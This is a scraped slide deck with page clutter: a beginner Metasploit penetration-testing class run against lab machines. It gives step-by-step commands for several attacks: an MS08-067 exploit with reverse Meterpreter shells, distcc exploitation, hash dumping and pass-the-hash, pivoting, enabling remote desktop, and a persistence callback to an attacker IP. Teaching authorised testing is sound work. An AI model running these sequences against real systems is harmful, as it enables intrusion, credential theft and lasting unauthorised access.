Metasploit for Penetration Testing: Beginner Class

Georgia Weidman
Georgia WeidmanInformation Security Consultant
Penetration Testing with Metasploit Georgia Weidman
Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
Our Database hosts services vulns -c select columns -s search for specific string
db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon
1 of 43

Metasploit for Penetration Testing: Beginner Class

Download to read offline
Technology

Slides for the beginning Metasploit class.

Georgia Weidman
Georgia WeidmanInformation Security Consultant

Recommended

Finalppt metasploit by
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
6.5K views57 slides
Metaploit by
MetaploitMetaploit
MetaploitAjinkya Pathak
2.8K views18 slides
Pen-Testing with Metasploit by
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
2.3K views29 slides
Metasploit framwork by
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
4K views42 slides
Intro to exploits in metasploitand payloads in msfvenom by
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
900 views19 slides
Pentest with Metasploit by
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
23.7K views36 slides

More Related Content

What's hot

Metasploit framework in Network Security by
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
627 views13 slides
Metasploit For Beginners by
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
994 views18 slides
Metasploit by
MetasploitMetasploit
MetasploitLalith Sai
446 views39 slides
Ch 5: Port Scanning by
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
4K views50 slides
Metasploit (Module-1) - Getting Started With Metasploit by
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
1.2K views25 slides
Metasploit seminar by
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
557 views20 slides

What's hot(20)

Metasploit framework in Network Security by Ashok Reddy Medikonda
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda627 views
Metasploit For Beginners by Ramnath Shenoy
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy994 views
Metasploit by Lalith Sai
MetasploitMetasploit
Metasploit
Lalith Sai446 views
Ch 5: Port Scanning by Sam Bowne
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
Sam Bowne4K views
Metasploit (Module-1) - Getting Started With Metasploit by Anurag Srivastava
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava1.2K views
Metasploit seminar by henelpj
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj557 views
Introduction to Metasploit by GTU
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU311 views
Bypassing anti virus using powershell by abend_cve_9999_0001
Bypassing anti virus using powershellBypassing anti virus using powershell
Bypassing anti virus using powershell
abend_cve_9999_00016K views
Metasploit by henelpj
MetasploitMetasploit
Metasploit
henelpj3.9K views
Introduction To OWASP by Marco Morana
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana3.4K views
System hacking by CAS
System hackingSystem hacking
System hacking
CAS2.6K views
Web application security I by Md Syed Ahamad
Web application security IWeb application security I
Web application security I
Md Syed Ahamad548 views
Port Scanning by amiable_indian
Port ScanningPort Scanning
Port Scanning
amiable_indian4.2K views
Introduction to Web Application Penetration Testing by Anurag Srivastava
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava2.2K views
Introduction To Exploitation & Metasploit by Raghav Bisht
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht1.5K views
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra... by Edureka!
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!2K views
Nmap and metasploitable by Mohammed Akbar Shariff
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
Mohammed Akbar Shariff2.5K views
Penetration testing using metasploit by Aashish R
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R1.2K views
Penetration Testing by RomSoft SRL
Penetration Testing Penetration Testing
Penetration Testing
RomSoft SRL4.8K views
Penetration Testing Basics by Rick Wanner
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner12.7K views

Viewers also liked

Metasploit by
MetasploitMetasploit
Metasploitninguna
7.5K views332 slides
Metasploit by
MetasploitMetasploit
MetasploitRaghunath G
2.6K views45 slides
Basic Metasploit by
Basic MetasploitBasic Metasploit
Basic MetasploitMuhammad Ridwan
790 views16 slides
Metasploit Basics by
Metasploit BasicsMetasploit Basics
Metasploit Basicsamiable_indian
4.1K views39 slides
Bypassing the Android Permission Model by
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission ModelGeorgia Weidman
4.1K views40 slides
Metasploit Humla for Beginner by
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginnern|u - The Open Security Community
6.7K views74 slides

Viewers also liked(18)

Metasploit by ninguna
MetasploitMetasploit
Metasploit
ninguna7.5K views
Metasploit by Raghunath G
MetasploitMetasploit
Metasploit
Raghunath G2.6K views
Basic Metasploit by Muhammad Ridwan
Basic MetasploitBasic Metasploit
Basic Metasploit
Muhammad Ridwan790 views
Metasploit Basics by amiable_indian
Metasploit BasicsMetasploit Basics
Metasploit Basics
amiable_indian4.1K views
Bypassing the Android Permission Model by Georgia Weidman
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
Georgia Weidman4.1K views
Metasploit Humla for Beginner by n|u - The Open Security Community
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community6.7K views
Ethical Hacking & Penetration Testing by Surachai Chatchalermpun
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
Surachai Chatchalermpun4.4K views
BSides Algiers - Metasploit framework - Oussama Elhamer by Shellmates
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
Shellmates931 views
Why Data Virtualization? An Introduction by Denodo by Justo Hidalgo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by Denodo
Justo Hidalgo12.5K views
Big Data Analytics with Hadoop by Philippe Julio
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with Hadoop
Philippe Julio441.9K views
Big data ppt by Nasrin Hussain
Big data pptBig data ppt
Big data ppt
Nasrin Hussain561.3K views
Alphorm.com Support de la formation Hacking et Sécurité Metasploit by Alphorm
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm31.6K views
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2 by thePlatform
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
thePlatform992 views
"15 Business Story Ideas to Jump on Now" by Reynolds Center for Business Journalism
"15 Business Story Ideas to Jump on Now""15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now"
Reynolds Center for Business Journalism3K views
Diarrhea:Myths and facts, Precaution by Wuzna Haroon
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution
Wuzna Haroon1.2K views
Alta White Paper D2C eCommerce Case Study 2016 by Patrick Nicholson
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016
Patrick Nicholson664 views
cathy resume by Catherine Towery Sales
cathy resumecathy resume
cathy resume
Catherine Towery Sales1.2K views
Basics of Coding in Pediatrics Medical Billing by Outsource Strategies International
Basics of Coding in Pediatrics Medical BillingBasics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical Billing
Outsource Strategies International8.2K views

Similar to Metasploit for Penetration Testing: Beginner Class

Laboratory exercise - Network security - Penetration testing by
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
2.2K views17 slides
Metasploit: Pwnage and Ponies by
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
2.8K views19 slides
Cheatsheet: Metasploit by
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: MetasploitKasper de Waard
658 views2 slides
Backtrack Manual Part6 by
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6Nutan Kumar Panda
2.4K views16 slides
Client side exploits by
Client side exploitsClient side exploits
Client side exploitsnickyt8
2.1K views22 slides
Hacking 101 by
Hacking 101Hacking 101
Hacking 101UTD Computer Security Group
99 views15 slides

Similar to Metasploit for Penetration Testing: Beginner Class(20)

Laboratory exercise - Network security - Penetration testing by seastorm44
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm442.2K views
Metasploit: Pwnage and Ponies by Trowalts
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts2.8K views
Cheatsheet: Metasploit by Kasper de Waard
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
Kasper de Waard658 views
Backtrack Manual Part6 by Nutan Kumar Panda
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
Nutan Kumar Panda2.4K views
Client side exploits by nickyt8
Client side exploitsClient side exploits
Client side exploits
nickyt82.1K views
Hacking 101 by UTD Computer Security Group
Hacking 101Hacking 101
Hacking 101
UTD Computer Security Group99 views
Penetration Testing Boot CAMP by Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert1.1K views
Server hardening by Teja Babu
Server hardeningServer hardening
Server hardening
Teja Babu1.4K views
Inside Out Hacking - Bypassing Firewall by amiable_indian
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
amiable_indian3.8K views
Metasploit for Web Workshop by Dennis Maldonado
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
Dennis Maldonado2.4K views
Pentesting with linux by Hammad Ahmed Khawaja
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja353 views
metaploit framework by Le Quyen
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen564 views
Wissbi osdc pdf by Chris Huang
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdf
Chris Huang638 views
24 33 -_metasploit by wozgeass
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass1.5K views
Backtrack Manual Part7 by Nutan Kumar Panda
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
Nutan Kumar Panda1.7K views
SSH for pen-testers by E D Williams
SSH for pen-testersSSH for pen-testers
SSH for pen-testers
E D Williams174 views
iCrOSS 2013_Pentest by M.Syarifudin, ST, OSCP, OSWP
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP 14.8K views
Sembang2 Keselamatan It 2004 by Linuxmalaysia Malaysia
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia756 views
Threats, Vulnerabilities & Security measures in Linux by Amitesh Bharti
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti3.9K views
Intro To Hacking by nayakslideshare
Intro To HackingIntro To Hacking
Intro To Hacking
nayakslideshare2.9K views

Recently uploaded

Digital Personal Data Protection (DPDP) Practical Approach For CISOs by
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
158 views59 slides
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda... by
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...ShapeBlue
161 views13 slides
CryptoBotsAI by
CryptoBotsAICryptoBotsAI
CryptoBotsAIchandureddyvadala199
40 views5 slides
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue by
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueWhat’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueShapeBlue
263 views23 slides
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPoolShapeBlue
123 views10 slides
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or... by
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...ShapeBlue
198 views20 slides

Recently uploaded(20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs by Priyanka Aash
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash158 views
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda... by ShapeBlue
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
ShapeBlue161 views
CryptoBotsAI by chandureddyvadala199
CryptoBotsAICryptoBotsAI
CryptoBotsAI
chandureddyvadala19940 views
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue by ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlueWhat’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
What’s New in CloudStack 4.19 - Abhishek Kumar - ShapeBlue
ShapeBlue263 views
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by ShapeBlue
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
ShapeBlue123 views
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or... by ShapeBlue
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...
ShapeBlue198 views
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T by ShapeBlue
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TCloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
ShapeBlue152 views
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online by ShapeBlue
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
ShapeBlue221 views
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ... by ShapeBlue
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
ShapeBlue166 views
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit... by ShapeBlue
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
ShapeBlue159 views
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue by ShapeBlue
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlueCloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue
CloudStack Managed User Data and Demo - Harikrishna Patnala - ShapeBlue
ShapeBlue135 views
"Surviving highload with Node.js", Andrii Shumada by Fwdays
"Surviving highload with Node.js", Andrii Shumada "Surviving highload with Node.js", Andrii Shumada
"Surviving highload with Node.js", Andrii Shumada
Fwdays56 views
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue by ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
ShapeBlue203 views
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by ShapeBlue
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
ShapeBlue173 views
Import Export Virtual Machine for KVM Hypervisor - Ayush Pandey - University ... by ShapeBlue
Import Export Virtual Machine for KVM Hypervisor - Ayush Pandey - University ...Import Export Virtual Machine for KVM Hypervisor - Ayush Pandey - University ...
Import Export Virtual Machine for KVM Hypervisor - Ayush Pandey - University ...
ShapeBlue119 views
Initiating and Advancing Your Strategic GIS Governance Strategy by Safe Software
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance Strategy
Safe Software176 views
Keynote Talk: Open Source is Not Dead - Charles Schulz - Vates by ShapeBlue
Keynote Talk: Open Source is Not Dead - Charles Schulz - VatesKeynote Talk: Open Source is Not Dead - Charles Schulz - Vates
Keynote Talk: Open Source is Not Dead - Charles Schulz - Vates
ShapeBlue252 views
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... by James Anderson
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
James Anderson160 views
Confidence in CloudStack - Aron Wagner, Nathan Gleason - Americ by ShapeBlue
Confidence in CloudStack - Aron Wagner, Nathan Gleason - AmericConfidence in CloudStack - Aron Wagner, Nathan Gleason - Americ
Confidence in CloudStack - Aron Wagner, Nathan Gleason - Americ
ShapeBlue130 views
Backroll, News and Demo - Pierre Charton, Matthias Dhellin, Ousmane Diarra - ... by ShapeBlue
Backroll, News and Demo - Pierre Charton, Matthias Dhellin, Ousmane Diarra - ...Backroll, News and Demo - Pierre Charton, Matthias Dhellin, Ousmane Diarra - ...
Backroll, News and Demo - Pierre Charton, Matthias Dhellin, Ousmane Diarra - ...
ShapeBlue186 views

Metasploit for Penetration Testing: Beginner Class

  • 1. Penetration Testing with Metasploit Georgia Weidman
  • 2. Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  • 3. Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4. Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  • 5. Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
  • 6. What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
  • 9. Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  • 10. Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
  • 11. Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  • 12. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 13. Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
  • 14. MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
  • 15. Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
  • 16. Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
  • 17. Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
  • 18. Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
  • 19. Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
  • 20. Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  • 21. Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
